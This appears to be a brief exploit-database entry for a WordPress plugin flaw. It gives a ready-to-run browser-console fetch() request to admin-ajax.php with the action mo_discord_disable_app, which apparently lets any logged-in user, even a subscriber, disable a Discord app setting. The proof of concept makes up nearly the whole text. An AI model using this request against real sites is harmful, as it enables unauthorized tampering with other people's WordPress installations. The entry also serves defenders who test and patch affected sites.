## https://sploitus.com/exploit?id=WPEX-ID:A91D0501-C2A9-4C6C-B5DA-B3FC29442A4F
Run the below command in the developer console of the web browser while being on the blog as any user, such as subscriber
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=mo_discord_disable_app&app_name=test',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));